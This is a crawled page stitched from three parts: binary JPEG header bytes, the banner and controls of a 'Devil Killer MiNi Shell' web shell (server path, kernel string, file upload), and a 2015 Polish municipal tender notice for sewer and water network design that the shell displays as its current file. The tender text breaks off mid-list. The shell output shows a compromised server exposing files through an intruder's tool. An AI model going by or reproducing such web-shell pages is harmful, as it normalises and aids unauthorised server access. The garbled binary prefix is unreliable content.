JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151223/188781-N-2015.html

<p class="kh_header"><b>Świeradów-Zdrój: Dokumentacja projektowa  rozbudowy sieci kanalizacji sanitarnej i sieci wodociągowej w Świeradowie-Zdroju</b><br>
<b>Numer ogłoszenia: 188781 - 2015; data zamieszczenia: 23.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. 11-go Listopada 35, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7816471, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja projektowa  rozbudowy sieci kanalizacji sanitarnej i sieci wodociągowej w Świeradowie-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje wykonanie zamówienia pn.: Dokumentacja projektowa  rozbudowy sieci kanalizacji sanitarnej i sieci wodociągowej w Świeradowie-Zdroju. 

1.2. Zakres prac obejmuje:
A. ETAP  I
Wykonanie dwóch odrębnych koncepcji:
1.  koncepcji rozbudowy sieci kanalizacyjnej w ulicach : 
a) ul. Nadbrzeżna - ok. 2600,00m,
b) ul. Zaułek - ok. 160,00m
c) ul. Kopernika - ok. 920,00m,
d) ul. Myśliwska - ok. 690,00m,
e) ul. Chopina - ok. 300,00m
f) ul. Kościuszki - Głowackiego -  ok. 430,00m
g) ul. Leśna - ok. 500,00m
h) ul. Kilińskiego - ok. 370,00m
i) ul. Krucza- ok. 300,00m
j) ul. Wilcza - ok. 100,00m
k) ul. Mokra - ok. 420,00m
l) ul. Kręta - ok. 250,00m
ł) ul. Kolejowa - ok. 800,00m
m) ul. Dworcowa -  ok. 200,00m
n) ul. Lipowa - ok. 280,00m
o) ul. Sosnowa - ok. 480,00m
p) ul. 11 Listopada - ok. 20,00m
r) ul. Boczna - ok. 250,00m
s) ul. Dolna - ok. 750,00m
t) ul. Grunwaldzka - ok. 120,00m
2.  koncepcji rozbudowy sieci wodociągowej w ulicach :  
a) ul. Nadbrzeżna - ok. 2600,00m,
b) ul. Kopernika - ok. 920,00m,
c) ul. Kościuszki-Głowackiego -  ok. 430,00m
d) ul. Leśna - ok. 500,00m
3. Podstawa do dalszego projektowania będzie decyzja Zamawiającego dotycząca zatwierdzenia dwóch odrębnych koncepcji.
B. ETAP  II
1. uzyskanie ostatecznej decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia, przeprowadzenie procedury oceny oddziaływania przedsięwzięcia na środowisko, zgodnie z Ustawą z dnia 03.10.2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2013 r., poz. 1235), dla przedsięwzięcia dotyczącego :
1.1. rozbudowy sieci kanalizacyjnej w ulicach : 
a) ul. Nadbrzeżna - ok. 2600,00m,
b) ul. Zaułek - ok. 160,00m
c) ul. Kopernika - ok. 920,00m,
d) ul. Myśliwska - ok. 690,00m,
e) ul. Chopina - ok. 300,00m
f) ul. Kościuszki-Głowackiego -  ok. 430,00m
g) ul. Leśna - ok. 500,00m
h) ul. Kilińskiego - ok. 370,00m
i) ul. Krucza- ok. 300,00m
j) ul. Wilcza - ok. 100,00m
k) ul. Mokra - ok. 420,00m
l) ul. Kręta - ok. 250,00m
ł) ul. Kolejowa - ok. 800,00m
m) ul. Dworcowa -  ok. 200,00m
n) ul. Lipowa - ok. 280,00m
o) ul. Sosnowa - ok. 480,00m
p) ul. 11 Listopada - ok. 20,00m
r) ul. Boczna - ok. 250,00m
s) ul. Dolna - ok. 750,00m
t) ul. Grunwaldzka - ok. 120,00m
1.2. rozbudowy sieci wodociągowej w ulicach :  
a) ul. Nadbrzeżna - ok. 2600,00m,
b) ul. Kopernika - ok. 920,00m,
c) ul. Kościuszki-Głowackiego -  ok. 430,00m
d) ul. Leśna - ok. 500,00m
2. do obowiązków Wykonawcy należy przygotowanie, złożenie wniosku o wydanie decyzji o środowiskowych uwarunkowaniach wraz z załącznikami, uzyskanie tej decyzji; Wykonawca zapewnia poświadczoną przez właściwy organ kopię mapy ewidencyjnej obejmującej przewidywany teren, na którym będzie realizowane przedsięwzięcie, oraz obejmującej obszar, na który będzie oddziaływać przedsięwzięcie. 
C. ETAP  III
Wykonanie dwóch odrębnych projektów budowlanych 
1. projekt budowlany budowy sieci kanalizacji sanitarnej z odgałęzieniami (po 6 egzemplarzy w wersji papierowej i po 2 egz. w wersji elektronicznej format PDF i DWG), w ulicach: 
a) ul. Nadbrzeżna - ok. 2600,00m,
b) ul. Zaułek - ok. 160,00m
c) ul. Kopernika - ok. 920,00m,
d) ul. Kościuszki-Głowackiego -  ok. 430,00m
e) ul. Leśna - ok. 500,00m
f) ul. Krucza- ok. 300,00m
g) ul. Mokra - ok. 420,00m
h) ul. Kręta - ok. 250,00m
i) ul. Kolejowa - ok. 800,00m
j) ul. Lipowa - ok. 280,00m
k) ul. Sosnowa - ok. 480,00m
l) ul. 11 Listopada - ok. 20,00m
ł) ul. Boczna - ok. 250,00m
m) ul. Dolna - ok. 750,00m
n) ul. Grunwaldzka - ok. 120,00m
2. projekt budowlany budowy sieci wodociągowej z odgałęzieniami (po 6 egzemplarzy w wersji papierowej i po 2 egz. w wersji elektronicznej format PDF i DWG), w ulicach: 
a) ul. Nadbrzeżna - ok. 2600,00m,
b) ul. Kopernika - ok. 920,00m,
c) ul. Kościuszki-Głowackiego -  ok. 430,00m
d) ul. Leśna - ok. 500,00m
3. sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianej w planie bezpieczeństwa i ochrony zdrowia,
4. określenie obszaru oddziaływania obiektu,
5. wykonanie map do celów projektowych,
6. wykonanie dokumentacji hydrogeologicznej określającej warunki hydrogeologiczne w zakresie niezbędnym do realizacji inwestycji na terenie przedsięwzięcia,
7. wykonanie dokumentacji geotechnicznej określającej warunki geologiczne w zakresie niezbędnym do realizacji inwestycji na terenie przedsięwzięcia,
8. przygotowanie materiałów do złożenia oświadczenia o posiadanym prawie do dysponowania nieruchomością na cele budowlane (wypisy z ewidencji gruntów, zgody wszystkich właścicieli i użytkowników),
9. zebranie wszystkich niezbędnych uzgodnień, dokumentów, opinii, postanowień i decyzji koniecznych do sporządzenia projektów,
10. zebranie wszystkich niezbędnych uzgodnień, dokumentów, opinii, postanowień i decyzji koniecznych do uzyskania   pozwoleń  na  budowę,
11. złożenie dwóch odrębnych wniosków o pozwolenie na budowę do Starostwa Powiatowego w Lubaniu, oddzielnie dla: budowy sieci kanalizacji sanitarnej i budowy sieci wodociągowej.
D. ETAP  IV
1. projekt wykonawczy budowy sieci kanalizacji sanitarnej z odgałęzieniami (po 6 egzemplarzy w wersji papierowej i po 2 egz. w wersji elektronicznej format PDF i DWG), w ulicach: 
a) ul. Nadbrzeżna - ok. 2600,00m,
b) ul. Zaułek - ok. 160,00m
c) ul. Kopernika - ok. 920,00m,
d) ul. Kościuszki-Głowackiego -  ok. 430,00m
e) ul. Leśna - ok. 500,00m
f) ul. Krucza- ok. 300,00m
g) ul. Mokra - ok. 420,00m
h) ul. Kręta - ok. 250,00m
i) ul. Kolejowa - ok. 800,00m
j) ul. Lipowa - ok. 280,00m
k) ul. Sosnowa - ok. 480,00m
l) ul. 11 Listopada - ok. 20,00m
ł) ul. Boczna - ok. 250,00m
m) ul. Dolna - ok. 750,00m
n) ul. Grunwaldzka - ok. 120,00m
2. projekt wykonawczy budowy sieci wodociągowej z odgałęzieniami (po 6 egzemplarzy w wersji papierowej i po 2 egz. w wersji elektronicznej format PDF i DWG), w ulicach: 
a) ul. Nadbrzeżna - ok. 2600,00m,
b) ul. Kopernika - ok. 920,00m,
c) ul. Kościuszki-Głowackiego -  ok. 430,00m,
d) ul. Leśna - ok. 500,00m,
3. opracowanie przedmiarów robót - (2 egz. w wersji papierowej i  2 egz. w wersji elektronicznej format exel i .ath),przy założeniu wynagrodzenia ryczałtowego Wykonawcy robót budowlanych,
4. wykonanie kosztorysów inwestorskich - (2 egz. w wersji papierowej i  2 egz. w wersji elektronicznej format PDF i .ath),
5. opracowanie specyfikacji technicznej wykonania i odbioru robót budowlano-montażowych -  (2 egz. w wersji papierowej i  2 egz. w wersji elektronicznej format edytowalny i PDF),przy założeniu wynagrodzenia ryczałtowego Wykonawcy robót budowlanych,
6. uzyskanie ostatecznych decyzji zatwierdzających 2 projekty budowlane i udzielających pozwoleń na budowę.
7. opracowanie 2 odrębnych wyciągów (budowy sieci kanalizacji sanitarnej i budowy sieci wodociągowej) z dokumentacji technicznej (projekt i opis techniczny), który może być wymagany przy składaniu wniosków o przyznanie dofinansowania projektów realizowanych w ramach środków UE (w wersji papierowej i  w wersji elektronicznej format edytowalny i PDF),.
8. UWAGA ! Zarówno w części projektowej, kosztorysowej i przedmiarowej należy zachować odrębność opracowań dla: budowy sieci kanalizacji sanitarnej i budowy sieci wodociągowej.

1.3. Celem zamówienia jest uzyskanie przez Zamawiającego  kompletnej dokumentacji  projektowej zdania, która będzie stanowić  element   :
a) ubiegania się przez Zamawiającego do dofinansowania w ramach projektów unijnych np. ze środków RPO WD 2014-2020, działanie 4.2 Gospodarka wodno-ściekowa lub PROW 2014-2020, działanie Podstawowe usługi dla gospodarki i ludności wiejskiej  Program Rozwoju Obszarów Wiejskich; Powyższe związane jest z tym, że będzie ona oceniania przez zewnętrzną instytucje przyznającą dofinansowanie. W przypadku, w którym instytucja przyznającą dofinansowanie uzna dokumentację techniczną będącą przedmiotem niniejszej umowa za wadliwą jest w kompetencji nałożyć korektę finansową polegającą na nieprzyznaniu lub żądaniu zwrotu części 
lub całości pierwotnie przyznanych środków z dofinansowania. Jeżeli nałożenie na Zamawiającego jako Beneficjenta korekty finansowej powstanie z winy wykonawcy, to Zamawiający jako Beneficjent będzie dochodził 
od Wykonawcy zwrotu kwoty odpowiadającej wartości nałożonej korekty finansowej.
b) przygotowania opisu przedmiotu zamówienia publicznego, wyłonienia wykonawcy robót budowlanych i  udzielenia zamówienia publicznego w  drodze publicznego postępowania  przetargowego na wykonanie robót budowlanych; W zwiazku z powyższym przedmiotowa dokumentacja winna spełniać wymagania ustawy Prawo zamówień publicznych oraz rozporządzeń wykonawczych do ww. ustawy i w sposób jednoznaczny określać wymagania Zamawiającego stawiane względem Wykonawcy robót budowlanych.
b1) Wykonawca ma obowiązek opisywania proponowanych materiałów i urządzeń za pomocą cech technicznych i jakościowych, tzn. bez podawania znaków towarowych, patentów lub pochodzenia. Jeżeli nie będzie to możliwe Wykonawca zobowiazany jest do wskazania materiałów i urządzeń równoważnych wraz z podaniem zakresu równoważności. Wykonawca powziąwszy powyższą informację, zobowiązuje się do realizacji przedmiotu niniejszej umowy zgodnie z następującymi zasadami wykorzystania znaków towarowych, patentów, pochodzenia w treści zamawianej dokumentacji technicznej:
Wykonawca w dokumentacji technicznej stanowiącej przedmiot zamówienia będzie mógł używać znaków towarowych, patentów lub pochodzenia tylko jeżeli  będzie to uzasadnione specyfika przedmiotu zamówienia i nie będzie występowała możliwość opisania przedmiotu zamówienia lub jego części 
za pomocą dostatecznie dokładnych określeń,
Jeżeli ziszczą się przesłanki, o których mowa w lit. a, to Wykonawca każdorazowo przy użytym w treści dokumentacji technicznej będącej przedmiotem niniejszego zamówienia znaku towarowym, patencie 
lub pochodzeniu umieści wyrazy - lub równoważne-  oraz przygotuje obiektywne kryteria wedle, których równoważność ta  będzie oceniana.

1.4. Wykonawca podczas realizacji umowy zobowiązany jest do takiego działania na rzecz i w imieniu Zamawiającego, aby najkorzystniej zrealizować zamówienie tj. przy utrzymaniu standardów jakości działać na rzecz terminowego zakończenia realizacji zamówienia.
1.5. Prawa i obowiązki wynikające z niniejszego przedmiotu zamówienia, nie wykluczają obowiązku wykonywania w ramach zakresu umowy wszystkich innych czynności i zadań, które będą konieczne do prawidłowej realizacji umowy oraz zabezpieczenia interesów Zamawiającego zgodnie z obowiązującymi przepisami prawa. Czynności i zadania, o których mowa w zdaniu poprzedzającym realizowane będą z własnej inicjatywy Wykonawcy lub zgodnie z wytycznymi Zamawiającego  w ramach ustalonego wynagrodzenia ryczałtowego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 182.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności. W celu potwierdzenia, że Wykonawca spełnia warunek nr 1 należy przedłożyć Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych Wykonawca spełnia warunek nr 1 jeżeli przedłoży oświadczenie o którym mowa w kol. III zgodne ze wzorem stanowiącym załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia tj.osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych z doborem właściwych urządzeń w projekcie budowlanym bez ograniczeń do pełnienia funkcji projektanta  Wykonawca spełni przedmiotowy warunek jeżeli wykaże w wykazie osób (wzór w załączniku dołączonym do SIWZ), iż dysponuje lub będzie dysponował do wykonania zamówienia osobą posiadającą powyższe uprawnienia i kwalifikacje</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Wysokość zabezpieczenia należytego wykonania umowy - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności. W przypadku wystąpienia jednego z następujących zdarzeń: a) uniemożliwiających lub utrudniających prawidłowe wykonywanie zamówienia lub wykonanie zamówienia w terminie, których Wykonawca lub Zamawiający nie mogli przewidzieć, b) które mogą negatywnie wpłynąć na trwałość przedmiotu umowy, c) narazić Zamawiającego na szkodę, dopuszcza się zmiany w umowie. 2. Strony dopuszczają możliwość zmiany istotnych postanowień umowy odnośnie wynagrodzenia, płatności, terminu realizacji umowy lub przyjętych rozwiązań projektowych (technicznych) w przypadku: a) wystąpienia siły wyższej; b) wystąpienia okoliczności leżących wyłącznie po stronie Zamawiającego lub okoliczności niezależnych od stron umowy, np. przedłużenie procedur związanych z podziałem działek geodezyjnych, konieczności przeprowadzenia konsultacji społecznych lub innych uzasadnionych okoliczności, zaistniałych w trakcie realizacji przedmiotu umowy, które utrudniają lub uniemożliwiają prawidłowe i terminowe wykonanie przedmiotu umowy; c) nie wydania przez uprawniony organ w ustawowym terminie decyzji warunkującej kontynuację i zakończenie prac projektowych; d) konieczności przeprojektowania przebudowy uzbrojenia podziemnego w związku z uzyskanymi warunkami technicznymi od gestorów sieci lub nieotrzymaniem tych warunków w stosownym czasie; e) wprowadzenia zmian w realizacji inwestycji spowodowanych nowymi technologiami i postępem technicznym; f) działań i zaniechań organów władzy publicznej lub instytucji polskich, w tym zmian urzędowych interpretacji przepisów dotyczących wykonywania lub finansowania zamówienia. g) przerw w wykonywaniu zamówienia wynikających z innych zdarzeń niemożliwych do przewidzenia w chwili zawarcia umowy. Termin wykonania zamówienia (umowy) ulega wydłużeniu o czas równy trwaniu przerw w wykonywaniu zamówienia, h) zmiana postanowień niniejszej umowy na skutek zmiany powszechnie obowiązującego prawa, z wyłączeniem zmiany stawki VAT. i) zmiana sposobu wykonania zamówienia w stosunku do sposobu określonego przed zawarciem umowy, dopuszczalna jest na skutek okoliczności, których nie można było przewidzieć w chwili wyboru najkorzystniejszej oferty lub zmiany te są korzystne dla Zamawiającego, a Wykonawca wyrazi na nią zgodę. j) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy wymuszającej konieczność skoordynowania prac i wzajemnych powiązań. k) zmiany danych osobowych i zmiany osób tj. przedstawicieli Wykonawcy wymienionych w treści umowy, l) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami, 